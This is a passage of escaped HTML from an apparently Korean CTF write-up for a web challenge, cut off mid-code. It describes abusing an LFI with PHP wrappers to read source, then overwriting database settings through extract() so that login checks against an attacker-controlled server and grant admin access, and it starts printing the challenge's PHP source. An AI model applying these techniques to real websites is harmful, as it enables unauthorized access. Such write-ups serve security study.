style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;register 페이지의 경우 관리자에게 문의하여 로그인하라는 메시지가 나온다.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/BMEj6hKA27GzuK494VzCBNUdx2UBle0ErHWp7MxtNqGvmmycKu4Hx2NOQcMdEfYhfwtN6XAPa6v321bPFu7j1yaG-d20STZwL9P7N_G6tNujYqt_kb2Bpo1fxtSWswePQ-bUfrQF&quot; width=&quot;624&quot; height=&quot;96&quot; style=&quot;border: none; transform: rotate(0.00rad); -webkit-transform: rotate(0.00rad);&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;관리자에게 연락 할 수는 없기 때문에 page 파라미터에서 발생하는 LFI 취약점을 이용하여 PHP Wrapper로 페이지 소스를 긁어온다.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/3F9ylTCuUd42hQiaYbeWC7pKkKmOvP-E8yuiho3IvFArz1kuyv3zmw4EDnP0mWdOgZEhPafL-fGRLFUxQ3KOj5NaofHAkevqhsiSfltgBH3R9Z-t-typNpN01MEkvmUvAt9hln8c&quot; width=&quot;461&quot; height=&quot;453&quot; style=&quot;border: none; transform: rotate(0.00rad); -webkit-transform: rotate(0.00rad);&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;index.php를 살펴보면 conn.php를 include 한 이후 extract로 GET과 POST 파라미터를 변수화 시켜준다. 이 때 conn.php 안에 있는 db 정보를 변경할 수 있기 때문에 문제 페이지에서 받았던 SQL 테이블 데이터를 외부 서버에 생성 후 연결하여 admin으로 로그인 할 수 있다. &lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/Dk7c8kp_DLcdFYpSPZ_CnGPNnWX4PacjN3uWnOjdljzkxMTNTH9udWu3-VAsdXIRYcpsKvrH9twW3ErLkFT-WCueYyxWsPFlxG4LugHVY_yp1BTQgYgHFuqgu7fW6NkE2agFFYfG&quot; width=&quot;624&quot; height=&quot;280&quot; style=&quot;border: none; transform: rotate(0.00rad); -webkit-transform: rotate(0.00rad);&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;이 때 로그인 이후에는 위와 같이(login.php) 문제 서버의 세션으로 로그인이 유지되기 때문에 로그인 상태를 유지 할 수 있다.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/hShhRy8GDbrbk09oW98iqHiEPxXLYEq8ySX-GFy6yR68C7t6WJTu0pZIbwU7vA645-J0pkDc6BWzqYHzw_0adhSMdjSJ74Z1oD3UZm9o71gcTYK5gGtSmhbvbI-HQ9h8yamLbrK_&quot; width=&quot;396&quot; height=&quot;420&quot; style=&quot;border: none; transform: rotate(0.00rad); -webkit-transform: rotate(0.00rad);&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;위는 admin으로 로그인 한 후의 상태이다. 사용자를 초대 할 수 있으며, 해당 계정으로 접속 시 메시지를 자신에게 보내고 받을 수 있는 send.php와 show.php에 접근 할 수 있다.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;div dir=&quot;ltr&quot; style=&quot;margin-left:0pt;&quot;&gt;&lt;table style=&quot;border:none;border-collapse:collapse;width:468pt&quot;&gt;&lt;colgroup&gt;&lt;col width=&quot;*&quot;&gt;&lt;/colgroup&gt;&lt;tbody&gt;&lt;tr style=&quot;height:0pt&quot;&gt;&lt;td style=&quot;border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;&quot;&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.7999999999999998;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;function&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;generateRS&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($length &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; 64) {&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$characters &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$charactersLength &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;strlen&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($characters);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$randomString &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;''&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$urandom &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;fopen&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;/dev/urandom&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;rb&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; ($i &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; 0; $i &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $length; $i&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;++&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;) {&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$randomString &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;.=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $characters[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;ord&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;fread&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($urandom, 1)) &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;%&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; ($charactersLength &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; 1)];&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $randomString;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;if&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;!&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;ISSET&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($_SESSION[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'user'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;]) &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;||&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $_SESSION[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'user'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;] &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;===&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;admin&quot;&lt;/span&gt;&lt;span 